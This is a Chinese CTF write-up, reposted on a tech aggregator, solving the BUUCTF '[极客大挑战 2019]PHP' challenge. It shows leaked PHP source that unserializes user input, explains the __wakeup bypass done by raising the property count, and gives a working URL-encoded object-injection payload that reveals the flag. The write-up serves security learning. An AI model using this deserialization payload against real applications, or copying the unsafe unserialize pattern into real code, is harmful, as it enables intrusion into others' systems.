ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 编程语言> 文章详细

[极客大挑战 2019]PHP BUUCTF靶场

2021-10-15 11:01:43  阅读:205  来源: 互联网

标签:__ username 极客 22% echo BUUCTF 2019 wakeup password


源码泄露

进入主页先扫一下后台 

然后把源码下载下来

代码审计

index.php

<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>

主页通过get方式传入参数'select' ,并且对select参数反序化操作,这里猜到可能会是出题点,可能通过触发魔法函数来触发漏洞

class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

 这里看到三个魔法函数:

__construct:

当一个对象创建时调用(constructor)

__sleep:

方法在一个对象被序列化时调用

__wakeup:

方法在一个对象被反序列化时调用,这里可以看到当触发这个函数的时候后台把username强制改为'guest'。

__destruct:

当一个对象被销毁时调用(destructor),这里可以看到当触发这个魔法函数时,如果username=‘admin’,password=‘100’,就会把flag输出出来了。

利用思路:

我们需要实例化一个对象Name,并且Name中的username的参数为'admin',password的参数为100,但是网站入口处会对内容进行反序列化,此时会触发__wakeup()和__destruct()魔法函数,但是__wakeup魔法函数会对我们的username参数进行重新赋值,所以需要绕过这个函数。

__wakeup()函数绕过

当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。

例:

O:4:“xctf”:1:{s:4:“flag”;s:3:“111”;} //把红色位置的数字改大即可绕过__wakeup()魔法函数的自动触发

构造payload:

<?php
class Name{
    private $username = 'admin';
    private $password = 100; 
}
$a = new Name();
var_dump(serialize($a));
echo urlencode(serialize($a));//因为是私有属性所以要进行url编码,我也不知道为什么
?>

把这个数字改为比2大的数就行了

?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D

flag打出来了

 

标签:__,username,极客,22%,echo,BUUCTF,2019,wakeup,password
来源: https://blog.csdn.net/qq_38850916/article/details/120778103

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有